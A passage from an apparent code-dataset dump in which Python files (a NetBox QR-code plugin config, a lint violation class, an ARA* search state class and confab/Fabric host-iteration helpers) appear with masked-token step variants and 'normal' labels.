the link \\t\"))\r\n",
"step-ids": [
8,
10,
11,
12,
13
]
}
|
[
8,
10,
11,
12,
13
] |
from extras.plugins import PluginConfig
from .version import __version__
class QRCodeConfig(PluginConfig):
name = 'netbox_qrcode'
verbose_name = 'qrcode'
description = 'Generate QR codes for the objects'
version = __version__
author = 'Nikolay Yuzefovich'
author_email = '[email protected]'
required_settings = []
default_settings = {
'with_text': True,
'text_fields': ['name', 'serial'],
'font': 'TahomaBold',
'custom_text': None,
'text_location': 'right',
'qr_version': 1,
'qr_error_correction': 0,
'qr_box_size': 6,
'qr_border': 4,
'device': {
'text_fields': ['name', 'serial']
},
'rack': {
'text_fields': ['name']
},
'cable': {
'text_fields': [
'_termination_a_device',
'termination_a',
'_termination_b_device',
'termination_b',
]
}
}
config = QRCodeConfig # noqa E305
|
normal
|
{
"blob_id": "6306acd1508698687842ba6b55a839743af420cc",
"index": 5840,
"step-1": "<mask token>\n\n\nclass QRCodeConfig(PluginConfig):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass QRCodeConfig(PluginConfig):\n name = 'netbox_qrcode'\n verbose_name = 'qrcode'\n description = 'Generate QR codes for the objects'\n version = __version__\n author = 'Nikolay Yuzefovich'\n author_email = '[email protected]'\n required_settings = []\n default_settings = {'with_text': True, 'text_fields': ['name', 'serial'\n ], 'font': 'TahomaBold', 'custom_text': None, 'text_location':\n 'right', 'qr_version': 1, 'qr_error_correction': 0, 'qr_box_size': \n 6, 'qr_border': 4, 'device': {'text_fields': ['name', 'serial']},\n 'rack': {'text_fields': ['name']}, 'cable': {'text_fields': [\n '_termination_a_device', 'termination_a', '_termination_b_device',\n 'termination_b']}}\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass QRCodeConfig(PluginConfig):\n name = 'netbox_qrcode'\n verbose_name = 'qrcode'\n description = 'Generate QR codes for the objects'\n version = __version__\n author = 'Nikolay Yuzefovich'\n author_email = '[email protected]'\n required_settings = []\n default_settings = {'with_text': True, 'text_fields': ['name', 'serial'\n ], 'font': 'TahomaBold', 'custom_text': None, 'text_location':\n 'right', 'qr_version': 1, 'qr_error_correction': 0, 'qr_box_size': \n 6, 'qr_border': 4, 'device': {'text_fields': ['name', 'serial']},\n 'rack': {'text_fields': ['name']}, 'cable': {'text_fields': [\n '_termination_a_device', 'termination_a', '_termination_b_device',\n 'termination_b']}}\n\n\nconfig = QRCodeConfig\n",
"step-4": "from extras.plugins import PluginConfig\nfrom .version import __version__\n\n\nclass QRCodeConfig(PluginConfig):\n name = 'netbox_qrcode'\n verbose_name = 'qrcode'\n description = 'Generate QR codes for the objects'\n version = __version__\n author = 'Nikolay Yuzefovich'\n author_email = '[email protected]'\n required_settings = []\n default_settings = {'with_text': True, 'text_fields': ['name', 'serial'\n ], 'font': 'TahomaBold', 'custom_text': None, 'text_location':\n 'right', 'qr_version': 1, 'qr_error_correction': 0, 'qr_box_size': \n 6, 'qr_border': 4, 'device': {'text_fields': ['name', 'serial']},\n 'rack': {'text_fields': ['name']}, 'cable': {'text_fields': [\n '_termination_a_device', 'termination_a', '_termination_b_device',\n 'termination_b']}}\n\n\nconfig = QRCodeConfig\n",
"step-5": "from extras.plugins import PluginConfig\nfrom .version import __version__\n\n\nclass QRCodeConfig(PluginConfig):\n name = 'netbox_qrcode'\n verbose_name = 'qrcode'\n description = 'Generate QR codes for the objects'\n version = __version__\n author = 'Nikolay Yuzefovich'\n author_email = '[email protected]'\n required_settings = []\n default_settings = {\n 'with_text': True,\n 'text_fields': ['name', 'serial'],\n 'font': 'TahomaBold',\n 'custom_text': None,\n 'text_location': 'right',\n 'qr_version': 1,\n 'qr_error_correction': 0,\n 'qr_box_size': 6,\n 'qr_border': 4,\n 'device': {\n 'text_fields': ['name', 'serial']\n },\n 'rack': {\n 'text_fields': ['name']\n },\n 'cable': {\n 'text_fields': [\n '_termination_a_device',\n 'termination_a',\n '_termination_b_device',\n 'termination_b',\n ]\n }\n }\n\nconfig = QRCodeConfig # noqa E305\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
class Violation(object):
def __init__(self, line, column, code, message):
self.line = line
self.column = column
self.code = code
self.message = message
def __str__(self):
return self.message
def __repr__(self):
return 'Violation(line={}, column={}, code="{}", message="{}")'.format(
self.line, self.column, self.code, self.message)
|
normal
|
{
"blob_id": "c513ad6ef12ae7be5d17d8d44787691cbc065207",
"index": 9989,
"step-1": "class Violation(object):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class Violation(object):\n\n def __init__(self, line, column, code, message):\n self.line = line\n self.column = column\n self.code = code\n self.message = message\n <mask token>\n <mask token>\n",
"step-3": "class Violation(object):\n\n def __init__(self, line, column, code, message):\n self.line = line\n self.column = column\n self.code = code\n self.message = message\n\n def __str__(self):\n return self.message\n <mask token>\n",
"step-4": "class Violation(object):\n\n def __init__(self, line, column, code, message):\n self.line = line\n self.column = column\n self.code = code\n self.message = message\n\n def __str__(self):\n return self.message\n\n def __repr__(self):\n return 'Violation(line={}, column={}, code=\"{}\", message=\"{}\")'.format(\n self.line, self.column, self.code, self.message)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class State:
<|reserved_special_token_0|>
def __init__(self, x, y, theta, parent=None, parent_action=None, g=
float('inf'), h=float('inf')):
self.x = x
self.y = y
self.theta = theta % (2 * math.pi)
self.g = g
self.h = h
self.parent = parent
self.parent_action = parent_action
<|reserved_special_token_0|>
def __hash__(self):
deg = round(math.degrees(self.theta))
return hash((self.x, self.y, deg))
def __lt__(self, other):
return self.g < other.g
def setG(self, g):
self.g = g
def setH(self, h):
self.h = h
def setParent(self, parent):
self.parent = parent
def setParentAction(self, parent_action):
self.parent_action = parent_action
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class State:
<|reserved_special_token_0|>
def __init__(self, x, y, theta, parent=None, parent_action=None, g=
float('inf'), h=float('inf')):
self.x = x
self.y = y
self.theta = theta % (2 * math.pi)
self.g = g
self.h = h
self.parent = parent
self.parent_action = parent_action
def __eq__(self, other):
if not isinstance(other, State):
return False
return self.x == other.x and self.y == other.y and almostEqual(self
.theta, other.theta)
def __hash__(self):
deg = round(math.degrees(self.theta))
return hash((self.x, self.y, deg))
def __lt__(self, other):
return self.g < other.g
def setG(self, g):
self.g = g
def setH(self, h):
self.h = h
def setParent(self, parent):
self.parent = parent
def setParentAction(self, parent_action):
self.parent_action = parent_action
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class State:
"""This class represents the search state that will be used for ARA* search"""
def __init__(self, x, y, theta, parent=None, parent_action=None, g=
float('inf'), h=float('inf')):
self.x = x
self.y = y
self.theta = theta % (2 * math.pi)
self.g = g
self.h = h
self.parent = parent
self.parent_action = parent_action
def __eq__(self, other):
if not isinstance(other, State):
return False
return self.x == other.x and self.y == other.y and almostEqual(self
.theta, other.theta)
def __hash__(self):
deg = round(math.degrees(self.theta))
return hash((self.x, self.y, deg))
def __lt__(self, other):
return self.g < other.g
def setG(self, g):
self.g = g
def setH(self, h):
self.h = h
def setParent(self, parent):
self.parent = parent
def setParentAction(self, parent_action):
self.parent_action = parent_action
<|reserved_special_token_1|>
from utils import *
import math
class State:
"""This class represents the search state that will be used for ARA* search"""
def __init__(self, x, y, theta, parent=None, parent_action=None, g=
float('inf'), h=float('inf')):
self.x = x
self.y = y
self.theta = theta % (2 * math.pi)
self.g = g
self.h = h
self.parent = parent
self.parent_action = parent_action
def __eq__(self, other):
if not isinstance(other, State):
return False
return self.x == other.x and self.y == other.y and almostEqual(self
.theta, other.theta)
def __hash__(self):
deg = round(math.degrees(self.theta))
return hash((self.x, self.y, deg))
def __lt__(self, other):
return self.g < other.g
def setG(self, g):
self.g = g
def setH(self, h):
self.h = h
def setParent(self, parent):
self.parent = parent
def setParentAction(self, parent_action):
self.parent_action = parent_action
<|reserved_special_token_1|>
from utils import *
import math
class State:
"This class represents the search state that will be used for ARA* search"
def __init__(self, x, y, theta, parent=None, parent_action=None, g=float('inf'), h=float('inf')):
self.x = x
self.y = y
self.theta = theta % (2*math.pi)
self.g = g
self.h = h
self.parent = parent
self.parent_action = parent_action
def __eq__(self, other):
if not isinstance(other, State):
return False
return (self.x == other.x) and (self.y == other.y) and (almostEqual(self.theta, other.theta))
def __hash__(self):
deg = round(math.degrees(self.theta))
return hash((self.x, self.y, deg))
def __lt__(self, other):
return self.g < other.g
def setG(self, g):
self.g = g
def setH(self, h):
self.h = h
def setParent(self, parent):
self.parent = parent
def setParentAction(self, parent_action):
self.parent_action = parent_action
|
flexible
|
{
"blob_id": "c8f899958ce19e7e2bf1307a685e65873695f140",
"index": 9028,
"step-1": "<mask token>\n\n\nclass State:\n <mask token>\n\n def __init__(self, x, y, theta, parent=None, parent_action=None, g=\n float('inf'), h=float('inf')):\n self.x = x\n self.y = y\n self.theta = theta % (2 * math.pi)\n self.g = g\n self.h = h\n self.parent = parent\n self.parent_action = parent_action\n <mask token>\n\n def __hash__(self):\n deg = round(math.degrees(self.theta))\n return hash((self.x, self.y, deg))\n\n def __lt__(self, other):\n return self.g < other.g\n\n def setG(self, g):\n self.g = g\n\n def setH(self, h):\n self.h = h\n\n def setParent(self, parent):\n self.parent = parent\n\n def setParentAction(self, parent_action):\n self.parent_action = parent_action\n",
"step-2": "<mask token>\n\n\nclass State:\n <mask token>\n\n def __init__(self, x, y, theta, parent=None, parent_action=None, g=\n float('inf'), h=float('inf')):\n self.x = x\n self.y = y\n self.theta = theta % (2 * math.pi)\n self.g = g\n self.h = h\n self.parent = parent\n self.parent_action = parent_action\n\n def __eq__(self, other):\n if not isinstance(other, State):\n return False\n return self.x == other.x and self.y == other.y and almostEqual(self\n .theta, other.theta)\n\n def __hash__(self):\n deg = round(math.degrees(self.theta))\n return hash((self.x, self.y, deg))\n\n def __lt__(self, other):\n return self.g < other.g\n\n def setG(self, g):\n self.g = g\n\n def setH(self, h):\n self.h = h\n\n def setParent(self, parent):\n self.parent = parent\n\n def setParentAction(self, parent_action):\n self.parent_action = parent_action\n",
"step-3": "<mask token>\n\n\nclass State:\n \"\"\"This class represents the search state that will be used for ARA* search\"\"\"\n\n def __init__(self, x, y, theta, parent=None, parent_action=None, g=\n float('inf'), h=float('inf')):\n self.x = x\n self.y = y\n self.theta = theta % (2 * math.pi)\n self.g = g\n self.h = h\n self.parent = parent\n self.parent_action = parent_action\n\n def __eq__(self, other):\n if not isinstance(other, State):\n return False\n return self.x == other.x and self.y == other.y and almostEqual(self\n .theta, other.theta)\n\n def __hash__(self):\n deg = round(math.degrees(self.theta))\n return hash((self.x, self.y, deg))\n\n def __lt__(self, other):\n return self.g < other.g\n\n def setG(self, g):\n self.g = g\n\n def setH(self, h):\n self.h = h\n\n def setParent(self, parent):\n self.parent = parent\n\n def setParentAction(self, parent_action):\n self.parent_action = parent_action\n",
"step-4": "from utils import *\nimport math\n\n\nclass State:\n \"\"\"This class represents the search state that will be used for ARA* search\"\"\"\n\n def __init__(self, x, y, theta, parent=None, parent_action=None, g=\n float('inf'), h=float('inf')):\n self.x = x\n self.y = y\n self.theta = theta % (2 * math.pi)\n self.g = g\n self.h = h\n self.parent = parent\n self.parent_action = parent_action\n\n def __eq__(self, other):\n if not isinstance(other, State):\n return False\n return self.x == other.x and self.y == other.y and almostEqual(self\n .theta, other.theta)\n\n def __hash__(self):\n deg = round(math.degrees(self.theta))\n return hash((self.x, self.y, deg))\n\n def __lt__(self, other):\n return self.g < other.g\n\n def setG(self, g):\n self.g = g\n\n def setH(self, h):\n self.h = h\n\n def setParent(self, parent):\n self.parent = parent\n\n def setParentAction(self, parent_action):\n self.parent_action = parent_action\n",
"step-5": "from utils import *\nimport math\n\nclass State:\n \"This class represents the search state that will be used for ARA* search\"\n def __init__(self, x, y, theta, parent=None, parent_action=None, g=float('inf'), h=float('inf')):\n self.x = x\n self.y = y\n self.theta = theta % (2*math.pi)\n self.g = g\n self.h = h\n self.parent = parent\n self.parent_action = parent_action\n\n def __eq__(self, other):\n if not isinstance(other, State):\n return False\n return (self.x == other.x) and (self.y == other.y) and (almostEqual(self.theta, other.theta))\n\n def __hash__(self):\n deg = round(math.degrees(self.theta))\n return hash((self.x, self.y, deg))\n\n def __lt__(self, other):\n return self.g < other.g\n\n def setG(self, g):\n self.g = g\n def setH(self, h):\n self.h = h\n def setParent(self, parent):\n self.parent = parent\n def setParentAction(self, parent_action):\n self.parent_action = parent_action\n",
"step-ids": [
8,
9,
10,
11,
12
]
}
|
[
8,
9,
10,
11,
12
] |
<|reserved_special_token_0|>
def _get_environmentdef():
"""
Retreive the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort('Environment needs to be configured')
environmentdef = env.environmentdef
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
with this_hostname(host.host):
yield host
<|reserved_special_token_0|>
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),
directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*
templates_dirs), DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group='confab.extensions'):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _get_environmentdef():
"""
Retreive the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort('Environment needs to be configured')
environmentdef = env.environmentdef
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
with this_hostname(host.host):
yield host
def iter_hosts_and_roles():
"""
Iterate over all hosts and roles in the configured environment.
"""
environmentdef = _get_environmentdef()
for host_and_role in environmentdef.all():
with this_hostname(host_and_role.host):
yield host_and_role
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),
directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*
templates_dirs), DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group='confab.extensions'):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@contextmanager
def this_hostname(hostname):
"""
Context manager that uses the current SSH confg to switch Fabric to a specific hostname.
Updates hostname and port.
"""
host_config = ssh_config(hostname)
host_string = hostname
port = host_config.get('port', env.default_port)
with settings(host_string=host_string, port=port):
yield
def _get_environmentdef():
"""
Retreive the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort('Environment needs to be configured')
environmentdef = env.environmentdef
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
with this_hostname(host.host):
yield host
def iter_hosts_and_roles():
"""
Iterate over all hosts and roles in the configured environment.
"""
environmentdef = _get_environmentdef()
for host_and_role in environmentdef.all():
with this_hostname(host_and_role.host):
yield host_and_role
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),
directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*
templates_dirs), DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group='confab.extensions'):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from contextlib import contextmanager
from fabric.api import env, settings, abort
from os.path import join
from pkg_resources import iter_entry_points
from warnings import warn
from fabric.network import ssh_config
from confab.options import options
from confab.validate import assert_exists
from confab.loaders import FileSystemEnvironmentLoader
from confab.data import DataLoader
from confab.conffiles import ConfFiles
@contextmanager
def this_hostname(hostname):
"""
Context manager that uses the current SSH confg to switch Fabric to a specific hostname.
Updates hostname and port.
"""
host_config = ssh_config(hostname)
host_string = hostname
port = host_config.get('port', env.default_port)
with settings(host_string=host_string, port=port):
yield
def _get_environmentdef():
"""
Retreive the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort('Environment needs to be configured')
environmentdef = env.environmentdef
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
with this_hostname(host.host):
yield host
def iter_hosts_and_roles():
"""
Iterate over all hosts and roles in the configured environment.
"""
environmentdef = _get_environmentdef()
for host_and_role in environmentdef.all():
with this_hostname(host_and_role.host):
yield host_and_role
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),
directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*
templates_dirs), DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group='confab.extensions'):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
<|reserved_special_token_1|>
"""
Iterations over :term:`hosts<host>`, :term:`roles<role>`,
:term:`components<component>` and config files.
"""
from contextlib import contextmanager
from fabric.api import env, settings, abort
from os.path import join
from pkg_resources import iter_entry_points
from warnings import warn
from fabric.network import ssh_config
from confab.options import options
from confab.validate import assert_exists
from confab.loaders import FileSystemEnvironmentLoader
from confab.data import DataLoader
from confab.conffiles import ConfFiles
@contextmanager
def this_hostname(hostname):
"""
Context manager that uses the current SSH confg to switch Fabric to a specific hostname.
Updates hostname and port.
"""
host_config = ssh_config(hostname)
host_string = hostname
port = host_config.get("port", env.default_port)
with settings(host_string=host_string,
port=port):
yield
def _get_environmentdef():
"""
Retreive the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort("Environment needs to be configured")
environmentdef = env.environmentdef
# If we're running via `fab`, we should restrict the environment
# to the current host.
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
# fabric needs the host if we're calling from main()
with this_hostname(host.host):
yield host
def iter_hosts_and_roles():
"""
Iterate over all hosts and roles in the configured environment.
"""
environmentdef = _get_environmentdef()
for host_and_role in environmentdef.all():
# fabric needs the host if we're calling from main()
with this_hostname(host_and_role.host):
yield host_and_role
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
# Construct directories
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()), directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role,
FileSystemEnvironmentLoader(*templates_dirs),
DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group="confab.extensions"):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
|
flexible
|
{
"blob_id": "cc019c732003ed72db80a7893096a0bef0f12e47",
"index": 4168,
"step-1": "<mask token>\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\n<mask token>\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-2": "<mask token>\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-3": "<mask token>\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n host_string = hostname\n port = host_config.get('port', env.default_port)\n with settings(host_string=host_string, port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), 